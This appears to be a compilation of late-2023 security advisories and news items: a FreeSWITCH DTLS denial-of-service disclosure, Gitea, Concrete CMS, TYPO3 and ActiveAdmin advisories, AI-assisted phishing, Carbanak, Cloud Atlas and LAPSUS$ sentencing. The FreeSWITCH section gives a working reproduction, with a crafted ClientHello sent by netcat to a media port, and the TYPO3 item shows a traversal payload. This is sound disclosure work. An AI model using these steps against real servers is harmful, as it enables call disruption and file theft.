When handling DTLS-SRTP for media setup, FreeSWITCH version 1.10.10 is susceptible to denial of service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.

# FreeSWITCH susceptible to Denial of Service via DTLS Hello packets during call initiation

- Fixed versions: 1.10.11  
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-02-freeswitch-dtls-hello-race  
- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6  
- Other references: CVE-2023-51443  
- Tested vulnerable versions: 1.10.10  
- Timeline:  
  - Report date: 2023-09-27  
  - Triaged: 2023-09-27  
  - Fix provided for testing: 2023-09-29  
  - Vendor release with fix: 2023-12-22  
  - Enable Security advisory: 2023-12-22

## TL;DR

When handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.

## Description

Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)[^1] is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too.

This behavior was tested against FreeSWITCH version 1.10.10, which was found to be vulnerable to this issue.

The following sequence diagram shows the normal flow (i.e. no attack) involving SIP and DTLS messages between a UAC (the Caller) and an FreeSWITCH server capable of handling WebRTC calls.

Diagram showing a call setup against FreeSWITCH that uses SIP and DTLS:  
https://user-images.githubusercontent.com/4557407/271063734-85425e09-6945-49b1-ba73-751b6d592ea4.png

In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to FreeSWITCH's media port from a different IP and port, FreeSWITCH responded by sending a DTLS Alert to the Caller. Additionally, FreeSWITCH terminated the SIP call by sending a BYE message to the Caller.

Diagram showing a call setup against FreeSWITCH that fails due to an attacker controlled DTLS ClientHello:  
https://user-images.githubusercontent.com/4557407/271064011-032f9a0e-15af-4645-b008-1fe8b706d75e.png

During a real attack, the attacker would spray a vulnerable FreeSWITCH server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, the call terminates, resulting in Denial of Service.

## Impact

Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP.

## How to reproduce the issue

1. Prepare a FreeSWITCH server with an extension configured to handle WebRTC  
1. Send an INVITE message to the target server with WebRTC SDP:

    ```default  
  INVITE sip:1000@192.168.1.202 SIP/2.0  
  Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-jQcnXJadB2VGfGmQ  
  Max-Forwards: 70  
  From: <sip:1000@192.168.1.202>;tag=L9kc5NfpYG1u67cT  
  To: <sip:1000@192.168.1.202>  
  Contact: <sip:1000@192.168.1.202>  
  Call-ID: DzGnBLt0z9SK3MC0  
  CSeq: 5 INVITE  
  Content-Type: application/sdp  
  Content-Length: 385

  v=0  
  o=- 1695296331 1695296331 IN IP4 192.168.1.202  
  s=-  
  t=0 0  
  c=IN IP4 192.168.1.202  
  m=audio 45825 UDP/TLS/RTP/SAVPF 0 8 101  
  a=setup:active  
  a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3  
  a=rtpmap:0 PCMU/8000/1  
  a=rtpmap:8 PCMA/8000/1  
  a=rtpmap:101 telephone-event/8000  
  a=rtcp-mux  
  a=rtcprsize  
  a=sendrecv  
  ```  
1. Note FreeSWITCH's media port and IP values, which will be used as the `<freeswitch-ip>` and `<media-port>` parameters by the Attacker  
1. Send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the FreeSWITCH server

    ```bash  
  CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA"   
  CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H"  
  CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF"  
  CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF"  
  CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA="  
  echo -n "${CLIENT_HELLO}" | base64 --decode | nc -u <freeswitch-ip> <media-port>  
  ```  
1. Observe that the Caller received a DTLS Alert message and a SIP BYE message on its signaling channel

Note that the above steps are used to reliably reproduce the vulnerability. In case of a real attack, the attacker simply has to spray the FreeSWITCH server with DTLS messages.

## Solution and recommendations

To address this vulnerability, upgrade FreeSWITCH to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.

[^1]: Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764

--

     Sandro Gauci, CEO at Enable Security GmbH

    Register of Companies:       AG Charlottenburg HRB 173016 B  
    Company HQ:                       Neuburger Straße 101 b, 94036 Passau, Germany  
    RTCSec Newsletter:               https://www.rtcsec.com/subscribe  
    Our blog:                                https://www.rtcsec.com  
    Other points of contact:       https://www.enablesecurity.com/contact/

FreeSWITCH 1.10.10 Denial Of Service

Gentoo Linux Security Advisory 202312-13 - Multiple vulnerabilities have been discovered in Gitea, the worst of which could result in information leakage. Versions greater than or equal to 1.20.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Gitea: Multiple Vulnerabilities  
     Date: December 23, 2023  
     Bugs: #887825, #891983, #905886, #918674  
       ID: 202312-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Gitea, the worst of  
which could result in information leakage.

Background  
=========  
Gitea is a painless self-hosted Git service.

Affected packages  
================  
Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
www-apps/gitea  < 1.20.6      >= 1.20.6

Description  
==========  
Multiple vulnerabilities have been discovered in Gitea. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Gitea users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-apps/gitea-1.20.6"

References  
=========  
[ 1 ] CVE-2023-3515  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3515

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-13

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-13

Cybercriminals now have AI to write their phishing emails, which might well improve their success rates. Here's what to watch out for.

Phishing is the art of sending an email with the aim of getting users to open a malicious file or click on a link to then steal credentials. But most phishers aren’t very good, and the success rate is relatively low: In 2021, the average click rate for a phishing campaign was 17.8%.

However, now cybercriminals have AI to write their emails, which might well improve their phishing success rates. Here’s why.

The old clues for telling if something was a phishing mail were:

1.  It asks you to update/fill in personal information.
2.  The URL on the email and the URL that displays when you hover over the link are different from one another.
3.  The “From” address is an imitation of a legitimate address, especially from a known brand.
4.  The formatting and design are different from what you usually receive from a brand.
5.  The content is badly written and may well include typos.
6.  There is a sense of urgency in the message, encouraging you to quickly perform an action.
7.  The email contains an attachment you weren’t expecting.

While most of these are still valid, there are a few checks you can strike off your list due to the introduction of AI.

When a phisher is using a Large Language Model (LLM) like ChatGPT, a few simple instructions are all it takes to make the email look as if it came from the intended sender. And LLMs do not make grammatical errors or put extra spaces between words (unless you ask them to).

They’re not limited to one language ether. AI can write the same mail in every desired language and make it look as if you are dealing with a native speaker. It’s also easier to create phishing emails tailored to the intended target.

All in all, the amount of work needed to create an effective phishing email has been reduced dramatically, and the number of phishing emails has gone up accordingly. In the last year, there’s been a 1,265% increase in malicious phishing emails, and a 967% rise in credential phishing in particular.

Because of AI, it’s become much harder to recognize phishing emails, which makes things almost impossible for filtering software. According to email security provider Egress 71% of email attacks created through Ai go undetected.

**So how do you recognize AI phishing emails?**

Here are some ideas:

Number 4 above—The formatting and design are different from what you usually receive from a brand—is helpful. Compare the email with any previous communications you have from the supposed sender. If there are inconsistencies in the tone, style, or vocabulary, this could indicate that the message is a phishing attempt.

Number 5—The content is badly written and may well include typos—AI phishing emails may still use generic greetings, such as “Dear user” or “Dear customer,” instead of addressing the recipient by name. Also, look for generic or mismatched signatures that do not align with the sender’s typical signature.

Number 7—The email contains an attachment you weren’t expecting—If you know the person who sent the email but don’t trust the content, contact the sender through an alternate communication method to verify whether they actually sent it.

For organizations it is important to have a clear reporting procedure and actively follow up on reported suspected phishing emails. If your employees never hear back about a reported phishing email, they are less likely to report the next one. A pat on the shoulder for catching one goes a long way. A lot further than the more common shame-and-blame punishments for clicking a malicious link.

Repetitive phishing training that neither aligns to how users engage with email, nor provides appropriate tools for responding to ambiguous emails are a waste of time, money, and the patience of the employee.

And most of all, make sure that your own communications, internal and external, don’t look like phishing attempts.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 How to recognize AI-generated phishing mails 

The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics.
"The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023.
"Carbanak returned last month through new

The banking malware known as **Carbanak** has been observed being used in ransomware attacks with updated tactics.

"The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023.

"Carbanak returned last month through new distribution chains and has been distributed through compromised websites to impersonate various business-related software."

Some of the impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero.

Carbanak, detected in the wild since at least 2014, is known for its data exfiltration and remote control features. Starting off as a banking malware, it has been put to use by the FIN7 cybercrime syndicate.

UPCOMING WEBINAR

From USER to ADMIN: Learn How Hackers Gain Full Control

Discover the secret tactics hackers use to become admins, how to detect and block it before it's too late. Register for our webinar today.

Join Now

In the latest attack chain documented by NCC Group, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities to trigger the deployment of Carbanak.

The development comes as 442 ransomware attacks were reported last month, up from 341 incidents in October 2023. A total of 4,276 cases have been reported so far this year, which is "less than 1000 incidents fewer than the total for 2021 and 2022 combined (5,198)."

The company's data shows that industrials (33%), consumer cyclicals (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks.

As for the most commonly spotted ransomware families, LockBit, BlackCat, and Play contributed to 47% (or 206 attacks) of 442 attacks. With BlackCat dismantled by authorities this month, it remains to be seen what impact the move will have on the threat landscape for the near future.

"With one month of the year still to go, the total number of attacks has surpassed 4,000 which marks a huge increase from 2021 and 2022, so it will be interesting to see if ransomware levels continue to climb next year," Matt Hull, global head of threat intelligence at NCC Group, said.

The spike in ransomware attacks in November has also been corroborated by cyber insurance firm Corvus, which said it identified 484 new ransomware victims posted to leak sites.

"The ransomware ecosystem at large has successfully pivoted away from QBot," the company said. "Making software exploits and alternative malware families part of their repertoire is paying off for ransomware groups."

While the shift is the result of a law enforcement takedown of QBot's (aka QakBot) infrastructure, Microsoft, last week, disclosed details of a low-volume phishing campaign distributing the malware, underscoring the challenges in fully dismantling these groups.

The development comes as Kaspersky revealed Akira ransomware's security measures prevent its communication site from being analyzed by raising exceptions while attempting to access the site using a debugger in the web browser.

The Russian cybersecurity company further highlighted ransomware operators' exploitation of different security flaws in the Windows Common Log File System (CLFS) driver – CVE-2022-24521, CVE-2022-37969, CVE-2023-23376, CVE-2023-28252 (CVSS scores: 7.8) – for privilege escalation.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Carbanak Banking Malware Resurfaces with New Ransomware Tactics

Concrete CMS 9 before 9.2.3 is vulnerable to Cross Site Request Forgery (CSRF) via `/ccm/system/dialogs/logs/delete_all/submit`. An attacker can force an admin user to delete server report logs on a web application to which they are currently authenticated.

**Concrete CMS Cross Site Request Forgery (CSRF)**

Moderate severity GitHub Reviewed Published Dec 25, 2023 to the GitHub Advisory Database • Updated Dec 27, 2023

GHSA-qp42-5pj7-4ccm: Concrete CMS Cross Site Request Forgery (CSRF)

The threat actor referred to as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises.
Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after Group-IB's formal exit from Russia earlier this year.
Cloud Atlas, active since at

Cyber Espionage / Malware

The threat actor referred to as **Cloud Atlas** has been linked to a set of spear-phishing attacks on Russian enterprises.

Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after Group-IB's formal exit from Russia earlier this year.

Cloud Atlas, active since at least 2014, is a cyber espionage group of unknown origin. Also called Clean Ursa, Inception, Oxygen, and Red October, the threat actor is known for its persistent campaigns targeting Russia, Belarus, Azerbaijan, Turkey, and Slovenia.

In December 2022, Check Point and Positive Technologies detailed multi-stage attack sequences that led to the deployment of a PowerShell-based backdoor referred to as PowerShower as well as DLL payloads capable of communicating with an actor-controlled server.

UPCOMING WEBINAR

From USER to ADMIN: Learn How Hackers Gain Full Control

Discover the secret tactics hackers use to become admins, how to detect and block it before it's too late. Register for our webinar today.

Join Now

The starting point is a phishing message bearing a lure document that exploits CVE-2017-11882, a six-year-old memory corruption flaw in Microsoft Office's Equation Editor, to kick-start the execution of malicious payloads, a technique Cloud Atlas has employed as early as October 2018.

"The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets," Kaspersky noted in August 2019. "Unlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating."

F.A.C.C.T. described the latest kill chain as similar to the one described by Positive Technologies, with successful exploitation of CVE-2017-11882 via RTF template injection paving the way for shellcode that's responsible for downloading and running an obfuscated HTA file. The mails originate from popular Russian email services Yandex Mail and VK's Mail.ru.

The malicious HTML application subsequently launches Visual Basic Script (VBS) files that are ultimately responsible for retrieving and executing an unknown VBS code from a remote server.

"The Cloud Atlas group has been active for many years, carefully thinking through every aspect of their attacks," Positive Technologies said of the group last year.

"The group's toolkit has not changed for years—they try to hide their malware from researchers by using one-time payload requests and validating them. The group avoids network and file attack detection tools by using legitimate cloud storage and well-documented software features, in particular in Microsoft Office."

The development comes as the company said that at least 20 organizations located in Russia have been compromised using Decoy Dog, a modified version of Pupy RAT, attributing it to an advanced persistent threat actor it calls Hellhounds.

The actively maintained malware, besides allowing the adversary to remotely control the infected host, comes with a scriptlet designed to transmit telemetry data to an "automated" account on Mastodon with the name "Lamir Hasabat" (@lahat) on the Mindly.Social instance.

"After materials on the first version of Decoy Dog were published, the malware authors went to a lot of effort to hamper its detection and analysis both in traffic and in the file system," security researchers Stanislav Pyzhov and Aleksandr Grigorian said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies

In TYPO3 11.5.24, the filelist component allows attackers (who have access to the administrator panel) to read arbitrary files via directory traversal in the baseuri field, as demonstrated by POST `/typo3/record/edit` with `../../../ in data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF]`.

**TYPO3 Arbitrary File Read via Directory Traversal**

Moderate severity GitHub Reviewed Published Dec 25, 2023 to the GitHub Advisory Database • Updated Dec 27, 2023

GHSA-3gjc-mp82-fj4q: TYPO3 Arbitrary File Read via Directory Traversal

By Owais Sultan
In the current high-tech age, consumer data is a business’s most important asset as they progressively shifts towards…
This is a post from HackRead.com Read the original post: Adobe Real-Time CDP: Personalized Customer Experience

Adobe Real-Time CDP: Personalized Customer Experience

csv_builder.rb in ActiveAdmin (aka Active Admin) before 3.2.0 allows CSV injection.

**ActiveAdmin vulnerable to CSV injection**

High severity GitHub Reviewed Published Dec 24, 2023 to the GitHub Advisory Database • Updated Dec 27, 2023

GHSA-rqxc-9p8h-xqgq: ActiveAdmin vulnerable to CSV injection

Two British teens part of the LAPSUS$ cyber crime and extortion gang have been sentenced for their roles in orchestrating a string of high-profile attacks against a number of companies.
Arion Kurtaj, an 18-year-old from Oxford, has been sentenced to an indefinite hospital order due to his intent to get back to cybercrime "as soon as possible," BBC reported. Kurtaj, who is autistic, was

Cyber Crime / Data Breach

Two British teens part of the LAPSUS$ cyber crime and extortion gang have been sentenced for their roles in orchestrating a string of high-profile attacks against a number of companies.

Arion Kurtaj, an 18-year-old from Oxford, has been sentenced to an indefinite hospital order due to his intent to get back to cybercrime "as soon as possible," BBC reported. Kurtaj, who is autistic, was deemed unfit to stand trial.

Another LAPSUS$ member, a 17-year-old unnamed minor, was sentenced to an 18-month-long Youth Rehabilitation Order, including a three-month intensive supervision and surveillance requirement. He was found guilty of two counts of fraud, two Computer Misuse Act offenses, and one count of blackmail.

Both defendants were initially arrested in January 2022, and then released under investigation. They were re-arrested in March 2022. While Kurtaj was later granted bail, he continued to attack various companies until he was arrested again in September.

UPCOMING WEBINAR

From USER to ADMIN: Learn How Hackers Gain Full Control

Discover the secret tactics hackers use to become admins, how to detect and block it before it's too late. Register for our webinar today.

Join Now

The attack spree, which took place between August 2020 and September 2022, targeted BT, EE, Globant, LG, Microsoft, NVIDIA, Okta, Revolut, Rockstar Games, Samsung, Ubisoft, Uber, and Vodafone.

LAPSUS$ is said to comprise members from the U.K. and Brazil. A third member of the group, also suspected to be a teen, was arrested in the South American nation in October 2022.

A report published by the U.S. Department of Homeland Security's (DHS) Cyber Safety Review Board (CSRB) this year revealed the threat actor's use of SIM-swapping attacks to take over victim accounts and infiltrate target networks. It also used a Telegram channel to publicize its operations and extort its victims.

Over the past year, the notoriety attracted by LAPSUS$ has also led to the emergence of another group called Scattered Spider. Both groups are part of a larger entity that calls itself the Comm.

According to the Federal Bureau of Investigation, the Comm consists of a "geographically diverse group of individuals, organized in various subgroups, all of whom coordinate through online communication applications such as Discord and Telegram" to engage in corporate intrusions, SIM swapping, crypto theft, real-life violence, and swatting.

"This case serves as an example of the dangers that young people can be drawn towards whilst online and the serious consequences it can have for someone's broader future," Amanda Horsburgh, detective chief superintendent from the City of London Police, said.

"Many young people wish to explore how technology works and what vulnerabilities exist. This can include learning to code, interacting with like-minded individuals online and experimenting with tools. Unfortunately, the digital world can also be tempting to young people for the wrong reasons."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#git